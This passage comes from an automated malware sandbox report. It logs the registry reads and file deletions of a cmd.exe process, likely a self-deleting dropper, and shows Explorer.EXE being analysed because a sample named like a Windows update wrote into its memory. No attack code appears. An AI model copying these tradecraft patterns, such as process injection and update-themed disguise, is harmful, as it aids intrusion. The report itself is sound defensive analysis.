Value Name: [ aFormatTagCache ], Value: [ 0x010000001000000006000000120000000700000012000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ],
Value Name: [ cFormatTags ], Value: [ 3 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ],
Value Name: [ aFormatTagCache ], Value: [ 0x0100000010000000420000001c000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000003100000014000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000003001000016000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000002200000032000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ AutoRun ], Value: [ ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ CompletionChar ], Value: [ 64 ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ DefaultColor ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ EnableExtensions ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ PathCompletionChar ], Value: [ 64 ], 1 time
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ midimapper ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.iac2 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.imaadpcm ], Value: [ ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.l3acm ], Value: [ C:\WINDOWS\system32\l3codeca.acm ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msadpcm ], Value: [ ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msaudio1 ], Value: [ msaud32.acm ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msg711 ], Value: [ msg711.acm ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msg723 ], Value: [ ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msgsm610 ], Value: [ msgsm32.acm ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.sl_anet ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.trspch ], Value: [ tssoft32.acm ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.I420 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.M261 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.M263 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.cvid ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iv31 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iv32 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iv41 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iv50 ], Value: [ ], 1 time
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iyuv ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.mrle ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.msvc ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.uyvy ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.yuy2 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.yvu9 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.yvyu ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ wavemapper ], Value: [ ], 2 times
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ DefaultLevel ], Value: [ 262144 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ PolicyScope ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ TransparentEnabled ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ ItemData ], Value: [ 0x5eab304f957a49896a006c1c31154015 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ ItemSize ], Value: [ 779 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ ItemData ], Value: [ 0x67b0d48b343a3fd3bce9dc646704f394 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ ItemSize ], Value: [ 517 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ ItemData ], Value: [ 0x327802dcfef8c893dc8ab006dd847d1d ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ ItemSize ], Value: [ 918 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ ItemData ], Value: [ 0xbd9a2adb42ebd8560e250e4df8162f67 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ ItemSize ], Value: [ 229 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ ItemData ], Value: [ 0x386b085f84ecf669d36b956a22c01e80 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ ItemSize ], Value: [ 370 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} ],
Value Name: [ ItemData ], Value: [ %HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK* ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ],
Value Name: [ ComputerName ], Value: [ PC ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm ],
Value Name: [ wheel ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Nls\Language Groups ],
Value Name: [ 1 ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Nls\Locale ],
Value Name: [ 00000C07 ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\ProductOptions ],
Value Name: [ ProductType ], Value: [ WinNT ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Command Processor ],
Value Name: [ CompletionChar ], Value: [ 9 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Command Processor ],
Value Name: [ DefaultColor ], Value: [ 0 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Command Processor ],
Value Name: [ EnableExtensions ], Value: [ 1 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Multimedia\Audio ],
Value Name: [ SystemFormats ], Value: [ CD Quality,Radio Quality,Telephone Quality ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ],
Value Name: [ Cache ], Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
Value Name: [ Local Settings ], Value: [ %USERPROFILE%\Local Settings ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
Value Name: [ Personal ], Value: [ %USERPROFILE%\My Documents ], 1 time
[=============================================================================]
4.b) cmd.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Deleted:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ C:\bc9deebcb0.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ C:\Program Files\Common Files\ ], Control Code: [ 0x00090028 ], 1 time
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 4 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Device Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ \Device\KsecDD ], Control Code: [ 0x00390008 ], 1 time
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Memory Mapped Files:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ C:\WINDOWS\AppPatch\AcGenral.DLL ]
File Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ]
File Name: [ C:\WINDOWS\WindowsShell.Manifest ]
File Name: [ C:\WINDOWS\system32\MSACM32.dll ]
File Name: [ C:\WINDOWS\system32\SHELL32.dll ]
File Name: [ C:\WINDOWS\system32\ShimEng.dll ]
File Name: [ C:\WINDOWS\system32\UxTheme.dll ]
File Name: [ C:\WINDOWS\system32\WINMM.dll ]
File Name: [ C:\WINDOWS\system32\comctl32.dll ]
File Name: [ C:\Windows\AppPatch\sysmain.sdb ]
[#############################################################################]
5. Explorer.EXE
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: KB00983751.exe wrote to the virtual memory of this process
Filename: Explorer.EXE
MD5: 12896823fb95bfb3dc9b46bcaedc9923
SHA-1: 9d2bf84874abc5b6e9a2744b7865c193c08d362f
File Size: 1033728 Bytes
Command Line: C:\WINDOWS\Explorer.EXE
Process-status
at analysis end: alive
Exit Code: 0
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\Secur32.dll ],
Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\BROWSEUI.dll ],
Base Address: [0x75F80000 ], Size: [0x000FD000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ],
Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\msvcrt.dll ],
Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\ole32.dll ],
Base Address: [0x774E0000 ], Size: [0x0013D000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\system32\OLEAUT32.dll ],
Base Address: [0x77120000 ], Size: [0x0008B000 ]
Module Name: [ C:\WINDOWS\system32\SHDOCVW.dll ],
Base Address: [0x7E290000 ], Size: [0x00171000 ]
Module Name: [ C:\WINDOWS\system32\CRYPT32.dll ],
Base Address: [0x77A80000 ], Size: [0x00095000 ]
Module Name: [ C:\WINDOWS\system32\MSASN1.dll ],
Base Address: [0x77B20000 ], Size: [0x00012000 ]
Module Name: [ C:\WINDOWS\system32\CRYPTUI.dll ],
Base Address: [0x754D0000 ], Size: [0x00080000 ]
Module Name: [ C:\WINDOWS\system32\NETAPI32.dll ],
Base Address: [0x5B860000 ], Size: [0x00055000 ]
Module Name: [ C:\WINDOWS\system32\VERSION.dll ],
Base Address: [0x77C00000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\WININET.dll ],
Base Address: [0x771B0000 ], Size: [0x000AA000 ]
Module Name: [ C:\WINDOWS\system32\WINTRUST.dll ],
Base Address: [0x76C30000 ], Size: [0x0002E000 ]
Module Name: [ C:\WINDOWS\system32\IMAGEHLP.dll ],
Base Address: [0x76C90000 ], Size: [0x00028000 ]
Module Name: [ C:\WINDOWS\system32\WLDAP32.dll ],
Base Address: [0x76F60000 ], Size: [0x0002C000 ]
Module Name: [ C:\WINDOWS\system32\SHELL32.dll ],
Base Address: [0x7C9C0000 ], Size: [0x00817000 ]
Module Name: [ C:\WINDOWS\system32\UxTheme.dll ],
Base Address: [0x5AD70000 ], Size: [0x00038000 ]
Module Name: [ C:\WINDOWS\system32\ShimEng.dll ],
Base Address: [0x5CB70000 ], Size: [0x00026000 ]
Module Name: [ C:\WINDOWS\AppPatch\AcGenral.DLL ],
Base Address: [0x6F880000 ], Size: [0x001CA000 ]
Module Name: [ C:\WINDOWS\system32\WINMM.dll ],
Base Address: [0x76B40000 ], Size: [0x0002D000 ]
Module Name: [ C:\WINDOWS\system32\MSACM32.dll ],
Base Address: [0x77BE0000 ], Size: [0x00015000 ]
Module Name: [ C:\WINDOWS\system32\USERENV.dll ],
Base Address: [0x769C0000 ], Size: [0x000B4000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ],
Base Address: [0x773D0000 ], Size: [0x00103000 ]
Module Name: [ C:\WINDOWS\system32\comctl32.dll ],
Base Address: [0x5D090000 ], Size: [0x0009A000 ]
Module Name: [ C:\WINDOWS\system32\appHelp.dll ],
Base Address: [0x77B40000 ], Size: [0x00022000 ]
Module Name: [ C:\WINDOWS\system32\CLBCATQ.DLL ],
Base Address: [0x76FD0000 ], Size: [0x0007F000 ]
Module Name: [ C:\WINDOWS\system32\COMRes.dll ],
Base Address: [0x77050000 ], Size: [0x000C5000 ]
Module Name: [ C:\WINDOWS\System32\cscui.dll ],
Base Address: [0x77A20000 ], Size: [0x00054000 ]
Module Name: [ C:\WINDOWS\System32\CSCDLL.dll ],
Base Address: [0x76600000 ], Size: [0x0001D000 ]
Module Name: [ C:\WINDOWS\system32\themeui.dll ],
Base Address: [0x5BA60000 ], Size: [0x00071000 ]
Module Name: [ C:\WINDOWS\system32\MSIMG32.dll ],
Base Address: [0x76380000 ], Size: [0x00005000 ]
Module Name: [ C:\WINDOWS\system32\xpsp2res.dll ],
Base Address: [0x00AC0000 ], Size: [0x002C5000 ]
Module Name: [ C:\WINDOWS\system32\actxprxy.dll ],
Base Address: [0x71D40000 ], Size: [0x0001B000 ]
Module Name: [ C:\WINDOWS\system32\msutb.dll ],
Base Address: [0x5FC10000 ], Size: [0x00033000 ]
Module Name: [ C:\WINDOWS\system32\MSCTF.dll ],
Base Address: [0x74720000 ], Size: [0x0004C000 ]
Module Name: [ C:\WINDOWS\system32\urlmon.dll ],
Base Address: [0x7E1E0000 ], Size: [0x000A2000 ]
Module Name: [ C:\WINDOWS\system32\LINKINFO.dll ],
Base Address: [0x76980000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\ntshrui.dll ],
Base Address: [0x76990000 ], Size: [0x00025000 ]
Module Name: [ C:\WINDOWS\system32\ATL.DLL ],
Base Address: [0x76B20000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\rsaenh.dll ],
Base Address: [0x68000000 ], Size: [0x00036000 ]
Module Name: [ C:\WINDOWS\system32\msi.dll ],
Base Address: [0x7D1E0000 ], Size: [0x002BC000 ]
Module Name: [ C:\WINDOWS\system32\WINSTA.dll ],
Base Address: [0x76360000 ], Size: [0x00010000 ]
Module Name: [ C:\WINDOWS\system32\webcheck.dll ],
Base Address: [0x74B30000 ], Size: [0x00046000 ]
Module Name: [ C:\WINDOWS\system32\WSOCK32.dll ],
Base Address: [0x71AD0000 ], Size: [0x00009000 ]
Module Name: [ C:\WINDOWS\system32\WS2_32.dll ],
Base Address: [0x71AB0000 ], Size: [0x00017000 ]
Module Name: [ C:\WINDOWS\system32\WS2HELP.dll ],
Base Address: [0x71AA0000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\stobject.dll ],
Base Address: [0x76280000 ], Size: [0x00021000 ]
Module Name: [ C:\WINDOWS\system32\BatMeter.dll ],
Base Address: [0x74AF0000 ], Size: [0x0000A000 ]
Module Name: [ C:\WINDOWS\system32\POWRPROF.dll ],
Base Address: [0x74AD0000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\SETUPAPI.dll ],
Base Address: [0x77920000 ], Size: [0x000F3000 ]
Module Name: [ C:\WINDOWS\system32\WTSAPI32.dll ],
Base Address: [0x76F50000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\NETSHELL.dll ],
Base Address: [0x76400000 ], Size: [0x001A5000 ]
Module Name: [ C:\WINDOWS\system32\credui.dll ],
Base Address: [0x76C00000 ], Size: [0x0002E000 ]
Module Name: [ C:\WINDOWS\system32\dot3api.dll ],
Base Address: [0x478C0000 ], Size: [0x0000A000 ]
Module Name: [ C:\WINDOWS\system32\rtutils.dll ],
Base Address: [0x76E80000 ], Size: [0x0000E000 ]
Module Name: [ C:\WINDOWS\system32\dot3dlg.dll ],
Base Address: [0x736D0000 ], Size: [0x00006000 ]
Module Name: [ C:\WINDOWS\system32\OneX.DLL ],
Base Address: [0x5DCA0000 ], Size: [0x00028000 ]
Module Name: [ C:\WINDOWS\system32\eappcfg.dll ],
Base Address: [0x745B0000 ], Size: [0x00022000 ]
Module Name: [ C:\WINDOWS\system32\MSVCP60.dll ],
Base Address: [0x76080000 ], Size: [0x00065000 ]
Module Name: [ C:\WINDOWS\system32\eappprxy.dll ],
Base Address: [0x5DCD0000 ], Size: [0x0000E000 ]
Module Name: [ C:\WINDOWS\system32\iphlpapi.dll ],
Base Address: [0x76D60000 ], Size: [0x00019000 ]
Module Name: [ C:\WINDOWS\system32\MPR.dll ],
Base Address: [0x71B20000 ], Size: [0x00012000 ]
Module Name: [ C:\WINDOWS\System32\drprov.dll ],
Base Address: [0x75F60000 ], Size: [0x00007000 ]
Module Name: [ C:\WINDOWS\System32\ntlanman.dll ],
Base Address: [0x71C10000 ], Size: [0x0000E000 ]
Module Name: [ C:\WINDOWS\System32\NETUI0.dll ],
Base Address: [0x71CD0000 ], Size: [0x00017000 ]
Module Name: [ C:\WINDOWS\System32\NETUI1.dll ],
Base Address: [0x71C90000 ], Size: [0x00040000 ]
Module Name: [ C:\WINDOWS\System32\NETRAP.dll ],
Base Address: [0x71C80000 ], Size: [0x00007000 ]
Module Name: [ C:\WINDOWS\System32\SAMLIB.dll ],
Base Address: [0x71BF0000 ], Size: [0x00013000 ]
Module Name: [ C:\WINDOWS\System32\davclnt.dll ],
Base Address: [0x75F70000 ], Size: [0x0000A000 ]
Module Name: [ C:\WINDOWS\system32\comdlg32.dll ],
Base Address: [0x763B0000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\MSGINA.dll ],
Base Address: [0x75970000 ], Size: [0x000F8000 ]
Module Name: [ C:\WINDOWS\system32\ODBC32.dll ],
Base Address: [0x74320000 ], Size: [0x0003D000 ]
Module Name: [ C:\WINDOWS\system32\odbcint.dll ],
Base Address: [0x01350000 ], Size: [0x00017000 ]
Module Name: [ C:\WINDOWS\system32\browselc.dll ],
Base Address: [0x71600000 ], Size: [0x00012000 ]
Module Name: [ C:\WINDOWS\system32\shdoclc.dll ],
Base Address: [0x71800000 ], Size: [0x00088000 ]
[=============================================================================]
Run-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\sensapi.dll ],
Base Address: [0x722B0000 ], Size: [0x00005000 ]
Module Name: [ C:\WINDOWS\system32\rasman.dll ],
Base Address: [0x76E90000 ], Size: [0x00012000 ]
Module Name: [ C:\WINDOWS\system32\TAPI32.dll ],
Base Address: [0x76EB0000 ], Size: [0x0002F000 ]
Module Name: [ C:\WINDOWS\system32\RASAPI32.DLL ],
Base Address: [0x76EE0000 ], Size: [0x0003C000 ]
[=============================================================================]
5.a) Explorer.EXE - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Keys Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
